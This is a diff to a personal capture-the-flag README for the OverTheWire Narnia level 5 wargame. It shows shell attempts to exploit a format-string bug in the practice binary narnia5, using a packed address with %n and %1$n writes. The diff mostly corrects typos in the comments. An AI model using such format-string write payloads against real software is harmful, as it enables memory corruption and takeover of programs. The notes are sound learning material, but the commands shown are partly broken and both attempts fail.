realvoidgojo/CTF-Challenges/OverTheWire/Narnia/README.md

 buffer : [���`            60d3ffff] (24)
 i = 1 (0xffffd360)

-# this happen %n can't define argument inside "string"
+# this happen %n can't define argument inside "string" because there are more.
 narnia5@gibson:/narnia$ ./narnia5 $(echo -e "\x60\xd3\xff\xff")%20x%n
 Segmentation fault (core dumped)

-# it worked but ponter value not increament beacuase $ is has to be escaped
+# it worked but pointer value not increment beacuase $ is has to be escaped because it is shell variable
 narnia5@gibson:/narnia$ ./narnia5 $(echo -e "\x60\xd3\xff\xff"")%20x%1$n
 Change i's value from 1 -> 500.
 No way...let me give you a hint! buffer : [���`            60d3ffff] (24)